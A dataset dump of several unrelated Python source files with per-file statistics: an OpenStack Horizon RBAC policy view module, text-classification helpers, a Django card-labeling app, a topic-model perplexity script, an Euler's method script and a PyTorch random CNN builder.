from horizon import messages
from horizon import tables
from horizon import tabs
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.rbac_policies \
import forms as rbac_policy_forms
from openstack_dashboard.dashboards.admin.rbac_policies \
import tables as rbac_policy_tables
from openstack_dashboard.dashboards.admin.rbac_policies \
import tabs as rbac_policy_tabs
class IndexView(tables.DataTableView):
table_class = rbac_policy_tables.RBACPoliciesTable
page_title = _("RBAC Policies")
@memoized.memoized_method
def _get_tenants(self):
try:
tenants, has_more = api.keystone.tenant_list(self.request)
except Exception:
tenants = []
msg = _("Unable to retrieve information about the "
"policies' projects.")
exceptions.handle(self.request, msg)
tenant_dict = OrderedDict([(t.id, t.name) for t in tenants])
return tenant_dict
def _get_networks(self):
try:
networks = api.neutron.network_list(self.request)
except Exception:
networks = []
msg = _("Unable to retrieve information about the "
"policies' networks.")
exceptions.handle(self.request, msg)
return dict((n.id, n.name) for n in networks)
def _get_qos_policies(self):
qos_policies = []
try:
if api.neutron.is_extension_supported(self.request,
extension_alias='qos'):
qos_policies = api.neutron.policy_list(self.request)
except Exception:
msg = _("Unable to retrieve information about the "
"policies' qos policies.")
exceptions.handle(self.request, msg)
return dict((q.id, q.name) for q in qos_policies)
def get_data(self):
try:
rbac_policies = api.neutron.rbac_policy_list(self.request)
except Exception:
rbac_policies = []
messages.error(self.request,
_("Unable to retrieve RBAC policies."))
if rbac_policies:
tenant_dict = self._get_tenants()
network_dict = self._get_networks()
qos_policy_dict = self._get_qos_policies()
for p in rbac_policies:
# Set tenant name and object name
p.tenant_name = tenant_dict.get(p.tenant_id, p.tenant_id)
p.target_tenant_name = tenant_dict.get(p.target_tenant,
p.target_tenant)
if p.object_type == "network":
p.object_name = network_dict.get(p.object_id, p.object_id)
elif p.object_type == "qos_policy":
p.object_name = qos_policy_dict.get(p.object_id,
p.object_id)
return rbac_policies
class CreateView(forms.ModalFormView):
template_name = 'admin/rbac_policies/create.html'
form_id = "create_rbac_policy_form"
form_class = rbac_policy_forms.CreatePolicyForm
submit_label = _("Create RBAC Policy")
submit_url = reverse_lazy("horizon:admin:rbac_policies:create")
success_url = reverse_lazy("horizon:admin:rbac_policies:index")
page_title = _("Create A RBAC Policy")
class UpdateView(forms.ModalFormView):
context_object_name = 'rbac_policies'
template_name = 'admin/rbac_policies/update.html'
form_class = rbac_policy_forms.UpdatePolicyForm
form_id = "update_rbac_policy_form"
submit_label = _("Save Changes")
submit_url = 'horizon:admin:rbac_policies:update'
success_url = reverse_lazy('horizon:admin:rbac_policies:index')
page_title = _("Update RBAC Policy")
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
args = (self.kwargs['rbac_policy_id'],)
context["rbac_policy_id"] = self.kwargs['rbac_policy_id']
context["submit_url"] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
rbac_policy_id = self.kwargs['rbac_policy_id']
try:
return api.neutron.rbac_policy_get(self.request, rbac_policy_id)
except Exception:
redirect = self.success_url
msg = _('Unable to retrieve rbac policy details.')
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
rbac_policy = self._get_object()
return {'rbac_policy_id': rbac_policy['id'],
'target_tenant': rbac_policy['target_tenant']}
class DetailView(tabs.TabView):
tab_group_class = rbac_policy_tabs.RBACDetailsTabs
template_name = 'horizon/common/_detail.html'
page_title = "{{ rbac_policy.id }}"
| 39.275862
| 78
| 0.657419
| 692
| 5,695
| 5.16763
| 0.239884
| 0.072707
| 0.042785
| 0.02349
| 0.321309
| 0.227349
| 0.183725
| 0.150727
| 0.032998
| 0.032998
| 0
| 0.000948
| 0.258999
| 5,695
| 144
| 79
| 39.548611
| 0.846446
| 0.097278
| 0
| 0.1875
| 0
| 0
| 0.149571
| 0.052457
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.125
| 0
| 0.464286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b0a85450199612c6bc6f56c812cbb9f71f501d
| 3,585
|
py
|
Python
|
legacy/text_classification/utils.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 4
|
2020-01-04T13:15:02.000Z
|
2021-07-21T07:50:02.000Z
|
legacy/text_classification/utils.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 2
|
2019-06-26T03:21:49.000Z
|
2019-09-19T09:43:42.000Z
|
legacy/text_classification/utils.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 3
|
2019-10-31T07:18:49.000Z
|
2020-01-13T03:18:39.000Z
|
import logging
import os
import argparse
from collections import defaultdict
logger = logging.getLogger("paddle")
logger.setLevel(logging.INFO)
def parse_train_cmd():
parser = argparse.ArgumentParser(
description="PaddlePaddle text classification example.")
parser.add_argument(
"--nn_type",
type=str,
help=("A flag that defines which type of network to use, "
"available: [dnn, cnn]."),
default="dnn")
parser.add_argument(
"--train_data_dir",
type=str,
required=False,
help=("The path of training dataset (default: None). If this parameter "
"is not set, paddle.dataset.imdb will be used."),
default=None)
parser.add_argument(
"--test_data_dir",
type=str,
required=False,
help=("The path of testing dataset (default: None). If this parameter "
"is not set, paddle.dataset.imdb will be used."),
default=None)
parser.add_argument(
"--word_dict",
type=str,
required=False,
help=("The path of word dictionary (default: None). If this parameter "
"is not set, paddle.dataset.imdb will be used. If this parameter "
"is set, but the file does not exist, word dictionay "
"will be built from the training data automatically."),
default=None)
parser.add_argument(
"--label_dict",
type=str,
required=False,
help=("The path of label dictionay (default: None).If this parameter "
"is not set, paddle.dataset.imdb will be used. If this parameter "
"is set, but the file does not exist, word dictionay "
"will be built from the training data automatically."),
default=None)
parser.add_argument(
"--batch_size",
type=int,
default=32,
help="The number of training examples in one forward/backward pass.")
parser.add_argument(
"--num_passes",
type=int,
default=10,
help="The number of passes to train the model.")
parser.add_argument(
"--model_save_dir",
type=str,
required=False,
help=("The path to save the trained models."),
default="models")
return parser.parse_args()
def build_dict(data_dir,
save_path,
use_col=0,
cutoff_fre=0,
insert_extra_words=[]):
values = defaultdict(int)
for file_name in os.listdir(data_dir):
file_path = os.path.join(data_dir, file_name)
if not os.path.isfile(file_path):
continue
with open(file_path, "r") as fdata:
for line in fdata:
line_splits = line.strip().split("\t")
if len(line_splits) < use_col: continue
for w in line_splits[use_col].split():
values[w] += 1
with open(save_path, "w") as f:
for w in insert_extra_words:
f.write("%s\t-1\n" % (w))
for v, count in sorted(
values.iteritems(), key=lambda x: x[1], reverse=True):
if count < cutoff_fre:
break
f.write("%s\t%d\n" % (v, count))
def load_dict(dict_path):
return dict((line.strip().split("\t")[0], idx)
for idx, line in enumerate(open(dict_path, "r").readlines()))
def load_reverse_dict(dict_path):
return dict((idx, line.strip().split("\t")[0])
for idx, line in enumerate(open(dict_path, "r").readlines()))
| 33.194444
| 80
| 0.577406
| 456
| 3,585
| 4.425439
| 0.309211
| 0.035679
| 0.067393
| 0.050545
| 0.453915
| 0.416254
| 0.416254
| 0.416254
| 0.399405
| 0.362735
| 0
| 0.004444
| 0.309623
| 3,585
| 107
| 81
| 33.504673
| 0.810909
| 0
| 0
| 0.37234
| 0
| 0
| 0.298466
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042553
| false
| 0.031915
| 0.042553
| 0.021277
| 0.117021
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b413225370fcaafee9296e6fca98be93952f44
| 2,188
|
py
|
Python
|
cards/views.py
|
KrTG/CardLabeling
|
8d267cf5d2dcc936005850a8f791115b3f716c92
|
[
"Apache-2.0"
] | null | null | null |
cards/views.py
|
KrTG/CardLabeling
|
8d267cf5d2dcc936005850a8f791115b3f716c92
|
[
"Apache-2.0"
] | null | null | null |
cards/views.py
|
KrTG/CardLabeling
|
8d267cf5d2dcc936005850a8f791115b3f716c92
|
[
"Apache-2.0"
] | null | null | null |
from .models import Card
from .helpers import fetch_unidentified, populate_db
from django.shortcuts import render, redirect
from django.http import Http404, HttpResponse
import json
def index(request):
next = fetch_unidentified()
if next:
return redirect('card', card_num=next)
else:
return redirect('done')
def done(request):
cards = Card.objects.all()
list = [(card.num, card.color, card.rank) for card in cards]
return HttpResponse(json.dumps(list))
def reset(request):
if request.method == 'GET':
return render(request, 'reset.html')
elif request.method == 'POST':
confirmation_text = request.POST.get('confirmation')
print(confirmation_text)
if confirmation_text.upper() == "RESET":
populate_db()
return HttpResponse("reset")
else:
return HttpResponse("not reset")
def card(request, card_num):
if request.method == 'GET':
try:
card = Card.objects.get(num=card_num)
except Card.DoesNotExist:
raise Http404("Card does not exist")
image_path = 'training_data/' + str(card_num) + '.png'
if card.color != '':
next_num = card_num + 1
return render(request, 'cards/card_done.html',
{'identified_card': str(card), 'path': image_path,
'next': next_num })
return render(request, 'cards/card.html',
{'path': image_path, 'card_num': card_num})
elif request.method == 'POST':
try:
card = Card.objects.get(num=card_num)
trash = request.POST.get('trash', None)
color = request.POST.get('color', None)
rank = request.POST.get('rank', None)
if trash == 'true':
card.color = 'not_card'
card.save()
elif color and rank:
card.color = color
card.rank = rank
card.save()
except Card.DoesNotExist:
raise Http404("Card does not exist")
return redirect('index')
| 30.388889
| 64
| 0.55713
| 241
| 2,188
| 4.958506
| 0.26971
| 0.05272
| 0.046862
| 0.030126
| 0.182427
| 0.135565
| 0.135565
| 0.135565
| 0.083682
| 0
| 0
| 0.006826
| 0.330439
| 2,188
| 71
| 65
| 30.816901
| 0.808874
| 0
| 0
| 0.285714
| 0
| 0
| 0.100548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.089286
| 0
| 0.321429
| 0.017857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b43f16dd23711b256eacbc743cd82a999578fd
| 2,439
|
py
|
Python
|
cptm/experiment_calculate_perplexity.py
|
egpbos/cptm
|
c5f310858c341040b4afd166cf628aeee6845159
|
[
"Apache-2.0"
] | 13
|
2016-03-14T14:58:04.000Z
|
2020-11-03T22:48:59.000Z
|
cptm/experiment_calculate_perplexity.py
|
egpbos/cptm
|
c5f310858c341040b4afd166cf628aeee6845159
|
[
"Apache-2.0"
] | 5
|
2015-10-30T12:34:16.000Z
|
2017-10-27T04:55:07.000Z
|
cptm/experiment_calculate_perplexity.py
|
egpbos/cptm
|
c5f310858c341040b4afd166cf628aeee6845159
|
[
"Apache-2.0"
] | 3
|
2016-03-03T10:49:05.000Z
|
2018-02-03T14:36:59.000Z
|
"""Calculate opinion perplexity for different numbers of topics
Calclulate opinion perplexity for the test set as described in [Fang et al.
2012] section 5.1.1.
This script should be run after experiment_number_of_topics.py.
Usage: python cptm/experiment_calculate_perplexity.py /path/to/experiment.json.
"""
import pandas as pd
import logging
from multiprocessing import Pool
import argparse
from cptm.utils.experiment import load_config, get_corpus, get_sampler
def calculate_perplexity(config, corpus, nPerplexity, nTopics):
sampler = get_sampler(config, corpus, nTopics, initialize=False)
results = []
for s in nPerplexity:
logger.info('doing perplexity calculation ({}, {})'.format(nTopics, s))
tw_perp, ow_perp = sampler.perplexity(index=s)
results.append((nTopics, s, tw_perp, ow_perp))
logger.info('finished perplexity calculation for {} topics'.
format(nTopics))
return results
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(levelname)s : %(message)s', level=logging.INFO)
logging.getLogger('gensim').setLevel(logging.ERROR)
logging.getLogger('CPTCorpus').setLevel(logging.ERROR)
logging.getLogger('CPT_Gibbs').setLevel(logging.ERROR)
parser = argparse.ArgumentParser()
parser.add_argument('json', help='json file containing experiment '
'configuration.')
args = parser.parse_args()
config = load_config(args.json)
corpus = get_corpus(config)
nTopics = config.get('expNumTopics')
nPerplexity = [0] + range(9, config.get('nIter')+1, 10)
# calculate perplexity
pool = Pool(processes=config.get('nProcesses'))
results = [pool.apply_async(calculate_perplexity, args=(config, corpus,
nPerplexity, n))
# reverse list, so longest calculation is started first
for n in nTopics[::-1]]
pool.close()
pool.join()
# aggrate and save results
data = [p.get() for p in results]
topic_perp = pd.DataFrame(columns=nTopics, index=nPerplexity)
opinion_perp = pd.DataFrame(columns=nTopics, index=nPerplexity)
for result in data:
for n, s, tw_perp, ow_perp in result:
topic_perp.set_value(s, n, tw_perp)
opinion_perp.set_value(s, n, ow_perp)
outDir = config.get('outDir')
logger.info('writing perplexity results to {}'.format(outDir.format('')))
topic_perp.to_csv(outDir.format('perplexity_topic.csv'))
opinion_perp.to_csv(outDir.format('perplexity_opinion.csv'))
| 33.410959
| 79
| 0.727347
| 321
| 2,439
| 5.398754
| 0.389408
| 0.025967
| 0.012118
| 0.01558
| 0.175995
| 0.110791
| 0.051933
| 0
| 0
| 0
| 0
| 0.006305
| 0.154572
| 2,439
| 72
| 80
| 33.875
| 0.834142
| 0.166052
| 0
| 0
| 0
| 0
| 0.14321
| 0.010864
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0
| 0.111111
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b5574ee7cafcbc4a7c1273ed0bb1bc35434615
| 819
|
py
|
Python
|
Eulers method.py
|
pramotharun/Numerical-Methods-with-Python
|
bd5676bcc4ac5defd13608728df2387b5fdcdfcb
|
[
"MIT"
] | null | null | null |
Eulers method.py
|
pramotharun/Numerical-Methods-with-Python
|
bd5676bcc4ac5defd13608728df2387b5fdcdfcb
|
[
"MIT"
] | null | null | null |
Eulers method.py
|
pramotharun/Numerical-Methods-with-Python
|
bd5676bcc4ac5defd13608728df2387b5fdcdfcb
|
[
"MIT"
] | null | null | null |
#Eulers method
import numpy as np
def dy(ynew,xnew,y,x,h):
dyvalue = y-x
return dyvalue
#Note: change the derivative function based on question!!!!!! Example: y-x
y0 = 0.5 #float(input"what is the y(0)?")
h = 0.1 #float(input"h?")
x_final = 0.3 #float(input"x_final")
#initiating input variables
x = 0
y = y0
# remember to change yn+1 and xn+1 values if you already know them!!!
ynew = 0
xnew = 0
i = 0
#####################################################
iterations = x_final/h
while x <= x_final:
derivative_of_y = dy(ynew,xnew,y,x,h)
xnew = x + h
ynew = y + (xnew - x)*(derivative_of_y)
print("iteration: ____ ")
print(i)
print("\n")
print("x = ")
print(xnew)
print("\n")
print("y = ")
print(ynew)
x = xnew
y = ynew
i+=1
| 19.5
| 76
| 0.543346
| 129
| 819
| 3.356589
| 0.418605
| 0.018476
| 0.046189
| 0.050808
| 0.060046
| 0.060046
| 0
| 0
| 0
| 0
| 0
| 0.026144
| 0.252747
| 819
| 41
| 77
| 19.97561
| 0.681373
| 0.304029
| 0
| 0.071429
| 0
| 0
| 0.090373
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.035714
| 0
| 0.107143
| 0.285714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b764a791904b90c564bbc7b72661cf5b307b36
| 18,896
|
py
|
Python
|
modules/network_dictionary_builder.py
|
shartzog/CovidCNN
|
68bafe185c53f98b896ee01fdcf99f828f251036
|
[
"MIT"
] | null | null | null |
modules/network_dictionary_builder.py
|
shartzog/CovidCNN
|
68bafe185c53f98b896ee01fdcf99f828f251036
|
[
"MIT"
] | null | null | null |
modules/network_dictionary_builder.py
|
shartzog/CovidCNN
|
68bafe185c53f98b896ee01fdcf99f828f251036
|
[
"MIT"
] | null | null | null |
"""
Contains Net and NetDictionary class for creating a random collection of CNN structures
or loading a previously created collection.
"""
from __future__ import division, print_function
from random import random
import os.path
import torch
from torch import nn
from torch import optim
from torch.nn import functional as F
import numpy as np
from numpy.random import randint as r_i
from tqdm import tqdm
DEBUG = False #prints tensor size after each network layer during network creation
DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'
if torch.cuda.is_available():
torch.cuda.set_device(0)
else:
print('**** CUDA not available - continuing with CPU ****')
#global classes
class Net(nn.Module):
"""
Build pytorch module using eval() on incoming model tensor and lists of eval strings
for layers and params.
"""
def __init__(self, modelinputtensor, layerlist, layerparams, **kwargs):
"""
args:
modelinputtensor: example model input tensor (including an arbitrary batch dimension)
layerlist: list of pytorch nn fucntions as their 'F' namespace equivalents
Example: 'nn.MaxPool2d' should be supplied as 'F.max_pool2d'
layerparams: list of _independent_ params in their nn form and passed as a tuple.
kwargs:
activations: list of activation functions for forward layers. the length
of the list must match the length of layerlist exactly even
though the activation function supplied for any pooling
layers will be ignored and the final value supplied will
always be replaced by Sigmoid.
Example:
The first conv2d layer will have 3 params in a tuple
of form (in_channels, out_channels, kernel_size).
Subsequent conv2d layers will have _2_ params in a tuple
of form (out_channels, kernel_size) since the in_channels
are determined by the previous layer.
Pooling layers will always have params of the form (x, y)
corresponding to the pooling window size.
Linear layers will always have a single param corresponding to
the number of out features for the layer since input
features are determined by the preceding layer)
"""
super(Net, self).__init__()
self.activations = kwargs.get('activations', ['F.relu' for layer in layerlist])
self.lyrs, self.fwdlyrs = self.get_layers(modelinputtensor, layerlist, layerparams, self.activations, DEBUG)
def forward(self, x):
"""
"""
for f in self.fwdlyrs:
x = eval(f)
return torch.sigmoid(x)
def get_layers(self, testtensor, funcs, params, activations, debug):
"""
Build network layers from supplied test tensor, funcs, and param eval strings.
"""
initlayers = nn.ModuleList()
fwdlayers = list()
if debug == 1:
print(testtensor.size())
lastsize = testtensor.size()
lastsize = None
lyr = 0
with torch.no_grad():
for fn, pa in zip(funcs, params):
if lastsize is not None:
if fn.__name__ == 'conv2d':
pa = (lastsize[1], pa[0], pa[1])
elif fn.__name__ == 'linear':
if not testtensor.ndim == 2:
testtensor = testtensor.view(-1, self.num_flat_features(testtensor))
fwdlayers.append("x.view(-1,self.num_flat_features(x))")
lastsize = testtensor.size()
pa = (lastsize[1], pa)
if fn.__name__ == 'conv2d':
paeval = ",".join(tuple(map(str, (pa[1], pa[0], pa[2], pa[2]))))
paeval = "torch.tensor(np.random.rand(" + paeval + "), dtype=torch.float32)"
elif fn.__name__ == 'max_pool2d':
paeval = ",".join(tuple(map(str, pa)))
elif fn.__name__ == 'linear':
paeval = ",".join(tuple(map(str, (pa[1], pa[0]))))
paeval = "torch.tensor(np.random.rand(" + paeval + "),dtype=torch.float32)"
if not fn.__name__ == 'linear' or pa[0] > pa[1]:
testtensor = fn(testtensor, eval(paeval))
lastsize = testtensor.size()
initlayers.append(eval(self.__get_init_equivalent(fn.__name__, pa)))
fwdlayers.append(self.__get_fwd_equivalent(fn.__name__, lyr))
lyr += 1
if debug == 1:
print(testtensor.size())
elif debug == 1:
print('NetDictionary: Eliminating linear layer - out features > previous layer')
fwdlayers[-1] = 'self.lyrs[' + str(lyr - 1) + '](x)'
return initlayers, fwdlayers
def num_flat_features(self, x):
"""
Calculate number of flat features in a given net layer.
Useful for transitioning between conv and linear layers.
"""
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def __get_init_equivalent(self, funcname, initparams):
"""
Construct eval string from supplied funtions and parameters for the
style required in the torch.nn.Module __init__.
"""
return 'nn.' + ''.join([val.capitalize()
for val in funcname.split('_')
]) + '(' + ",".join(tuple(map(str, initparams))) + ')'
def __get_fwd_equivalent(self, funcname, lyrnum):
"""
Construct eval string from supplied funtions and parameters for the
style required in the torch.nn.Module __init__.
"""
if not funcname == 'max_pool2d':
return self.activations[lyrnum] + '(self.lyrs[' + str(lyrnum) + '](x))'
else:
return 'self.lyrs[' + str(lyrnum) + '](x)'
class NetDictionary(dict):
"""
Holds a dictionary of Net with functions to build a model tensor and
random layer and param lists
"""
def __init__(self, network_count, test_tensor, total_labels, import_export_filename, **kwargs):
"""
Initialize a dictionary of randomly structured CNNs to test various network configurations.
args: network_count: number of networks to generate
test_tensor: a tensor that can be used to construct network layers
total_labels: the number of labels being predicted for the networks
import_export_filename: if file exists on initialization, the information in the
file will be used to reconstruct a prior network.
kwargs: optimizers: list of tuples of form (eval strings for optimizer creation, label)
default=[("optim.SGD(d['net'].parameters(), lr=0.0001, momentum=0.9)", "SGD"),
("optim.Adam(d['net'].parameters(), lr=0.0001)", "Adam"),
("optim.Adam(d['net'].parameters(), lr=0.00001)", "Adam1")]
force_rebuild: override import from file and recreate network even if
import_export_filename already exists, false
force_training: imported network training is bypassed if set to false
default=True
conv_layer_activation: activation function used by conv layers
default=F.relu
pooling_probability: approximate fraction of random networks that are assigned
a pooling layer, default = 0.5
first_conv_layer_depth, 4
max_conv_layers, 5
min_conv_layers, 1
max_kernel_size, 7
min_kernel_size, 3
max_out_channels, 12
min_out_channels, 4
linear_layer_activation, F.relu
init_linear_out_features, 1000
linear_feature_deadband, 20
max_layer_divisor, 20
min_layer_divisor, 4
"""
super(NetDictionary, self).__init__()
self.net_count = network_count
self.label_count = total_labels
self.import_export_filename = import_export_filename
self.__test_tensor = test_tensor
self._trained = False
self.force_rebuild = kwargs.get('force_rebuild', False)
self.force_training = kwargs.get('force_training', True)
self.pooling_probability = kwargs.get('pooling_probability', 0.5)
self.init_from_file = os.path.exists(import_export_filename) and not self.force_rebuild
if self.init_from_file and not self.force_rebuild:
self.__import_networks()
else:
self.__build_networks(**kwargs)
def __import_networks(self):
"""
Read layer info and net state dicts from disk.
"""
net_info = torch.load(self.import_export_filename)
self.__options = net_info['options'].copy()
self.optimizers = self.__options['optimizers']
for n_key, n_dict in net_info['state_dicts'].items():
d = dict()
d['net_number'] = net_info['net_numbers'][n_key]
d['func_list'] = net_info['func_lists'][n_key]
d['params'] = net_info['params'][n_key]
d['activations'] = net_info['activations'][n_key]
funcs = [eval(f) for f in d['func_list']]
d['net'] = Net(self.__test_tensor, funcs, d['params'],activations=d['activations'])
d['net'].load_state_dict(n_dict)
d['optimizer_type'] = net_info['optimizer_types'][n_key]
d['criterion'] = nn.BCELoss()
d['optimizer'] = eval([optim[0] for optim in self.optimizers if optim[1] == d['optimizer_type']][0])
d['loss_dictionary'] = net_info['loss_dictionaries'][n_key]
self.__setitem__(n_key, d)
self._trained = True
def __build_networks(self, **kwargs):
"""
build a new set of randomized networks
"""
self.__options = {
'optimizers': kwargs.get('optimizers',
[("optim.SGD(d['net'].parameters(), lr=0.0001, momentum=0.9)",
"SGD"),
("optim.Adam(d['net'].parameters(), lr=0.0001)", "Adam"),
("optim.Adam(d['net'].parameters(), lr=0.00001)", "Adam1"),
]),
'convolution_layer_options': {
'activation' : kwargs.get('conv_layer_activation', 'F.relu'),
'first_layer_depth' : kwargs.get('first_conv_layer_depth', 4),
'max_layers' : kwargs.get('max_conv_layers', 5),
'min_layers' : kwargs.get('min_conv_layers', 1),
'max_kernel_size' : kwargs.get('max_kernel_size', 7),
'min_kernel_size' : kwargs.get('min_kernel_size', 3),
'max_out_channels' : kwargs.get('max_out_channels', 12),
'min_out_channels' : kwargs.get('min_out_channels', 4),
},
'linear_layer_options': {
'activation' : kwargs.get('linear_layer_activation', 'F.relu'),
'init_out_features' : kwargs.get('init_linear_out_features', 1000),
'feature_deadband' : kwargs.get('linear_feature_deadband', 20),
'max_layer_divisor' : kwargs.get('max_layer_divisor', 20),
'min_layer_divisor' : kwargs.get('min_layer_divisor', 4),
},
}
self.optimizers = self.__options['optimizers']
for i in tqdm(range(self.net_count)):
cfs, cps = self.__get_convolution_layers(self.__options['convolution_layer_options'])
lfs, lps = self.__get_linear_layers(self.__options['linear_layer_options'])
funcs = cfs
params = cps
activations = [self.__options['convolution_layer_options']['activation'] for f in cfs]
if (random() < self.pooling_probability):
funcs.extend([F.max_pool2d])
pool_size = np.random.randint(2,4)
activations.extend(['F.relu'])
params.extend([(pool_size, pool_size)])
funcs.extend(lfs)
activations.extend([self.__options['linear_layer_options']['activation'] for f in lfs])
func_list = ['F.' + f.__name__ for f in funcs]
params.extend(lps)
for opt in self.optimizers:
d = dict()
d['net'] = Net(self.__test_tensor, funcs, params, activations=activations)
d['net_number'] = i
d['func_list'] = func_list
d['params'] = params
d['activations'] = activations
d['optimizer_type'] = opt[1]
d['criterion'] = nn.BCELoss()
d['optimizer'] = eval(opt[0])
self.__setitem__(str(i) + '-' + opt[1], d)
def __get_convolution_layers(self, c):
"""
Dynamically create a list of convolution layers. Parameters are used to manage the size,
complexity, and structure of each layer. NEEDS IMPROVEMENT.
"""
fncs, parms = list(),list()
fncs.append(F.conv2d)
parms.append((c['first_layer_depth'],
r_i(c['min_out_channels'], c['max_out_channels'] + 1),
r_i(c['min_kernel_size'], c['max_kernel_size']+1)))
for i in range(r_i(c['min_layers']-1,c['max_layers'])):
fncs.append(F.conv2d)
parms.append((r_i(c['min_out_channels'],c['max_out_channels'] + 1),
r_i(c['min_kernel_size'], c['max_kernel_size']+1)))
return fncs, parms
def __get_linear_layers(self, d):
"""
Dynamically create a list of linear layers.
Parameters are used to manage the size of each layer.
NEEDS IMPROVEMENT.
"""
fncs, parms = list(), list()
fncs.append(F.linear)
parms.append(d['init_out_features'])
nextoutfeatures = int(d['init_out_features']/r_i(d['min_layer_divisor'],
d['max_layer_divisor'] + 1))
while nextoutfeatures > self.label_count + d['feature_deadband']:
fncs.append(F.linear)
parms.append(nextoutfeatures)
nextoutfeatures = int(nextoutfeatures/r_i(d['min_layer_divisor'],
d['max_layer_divisor'] + 1))
fncs.append(F.linear)
parms.append(self.label_count)
return fncs,parms
def train_validate_networks(self, train_data, validation_images, validation_labels, loss_recording_rate):
for k, d in self.items():
net = d['net']
net.to(DEVICE)
net.train()
criterion = d['criterion']
optimizer = d['optimizer']
train_losses = []
validation_losses = []
last_loss = 0.0
running_loss = 0.0
if self.force_training or not self.init_from_file:
pbar = tqdm(enumerate(train_data), total=len(train_data))
for i, data in pbar:
#get the inputs; data is a list of [inputs, labels]
inputs, labels = data
inputs, labels = inputs.to(DEVICE), labels.to(DEVICE)
#zero the parameter gradients
optimizer.zero_grad()
#forward + backward + optimize
outputs = net(inputs)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if i % loss_recording_rate == loss_recording_rate - 1:
train_losses.append((i + 1, (running_loss - last_loss)/loss_recording_rate))
pbar.set_description(desc='net name: %s; loss: %.3f' % (k, running_loss/(i + 1)))
pbar.update()
last_loss = running_loss
last_loss = 0.0
valid_loss = 0.0
net.eval()
with torch.no_grad():
pbar = tqdm(enumerate(zip(validation_images,validation_labels)),total=len(validation_labels))
for j, (v_in, v_lab) in pbar:
v_in, v_lab = v_in.to(DEVICE), v_lab.to(DEVICE)
outputs = net(v_in)
loss = criterion(outputs, v_lab)
valid_loss += loss.item()
if j % loss_recording_rate == loss_recording_rate - 1:
validation_losses.append((j + 1, (valid_loss - last_loss)/loss_recording_rate))
last_loss = valid_loss
pbar.set_description(desc='net name: %s; loss: %.3f; validation loss: %.3f'
% (k, running_loss/len(train_data), valid_loss/(j + 1)))
pbar.update()
self[k]['loss_dictionary'] = {'train_losses':train_losses,
'validation_losses': validation_losses,
}
net.cpu()
self._trained = True
def export_networks(self):
"""
Write info required to reconstruct this NetDictionary to disk.
"""
state_dicts = {key : d['net'].state_dict() for key, d in self.items()}
net_numbers = {key : d['net_number'] for key, d in self.items()}
func_lists = {key : d['func_list'] for key, d in self.items()}
params = {key : d['params'] for key, d in self.items()}
activations = {key : d['activations'] for key, d in self.items()}
optimizer_types = {key : d['optimizer_type'] for key, d in self.items()}
loss_dictionaries = {key : d['loss_dictionary'] for key, d in self.items()}
torch.save({'state_dicts':state_dicts,
'net_numbers':net_numbers,
'func_lists':func_lists,
'params':params,
'activations':activations,
'optimizer_types':optimizer_types,
'options':self.__options,
'test_tensor':self.__test_tensor,
'loss_dictionaries':loss_dictionaries,
}, self.import_export_filename)
| 48.953368
| 116
| 0.556467
| 2,157
| 18,896
| 4.651368
| 0.164117
| 0.007575
| 0.015947
| 0.009568
| 0.26971
| 0.224559
| 0.1516
| 0.102063
| 0.094488
| 0.08193
| 0
| 0.012007
| 0.338855
| 18,896
| 386
| 117
| 48.953368
| 0.791083
| 0.232536
| 0
| 0.166667
| 0
| 0.003876
| 0.152856
| 0.029101
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050388
| false
| 0
| 0.065891
| 0
| 0.155039
| 0.01938
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
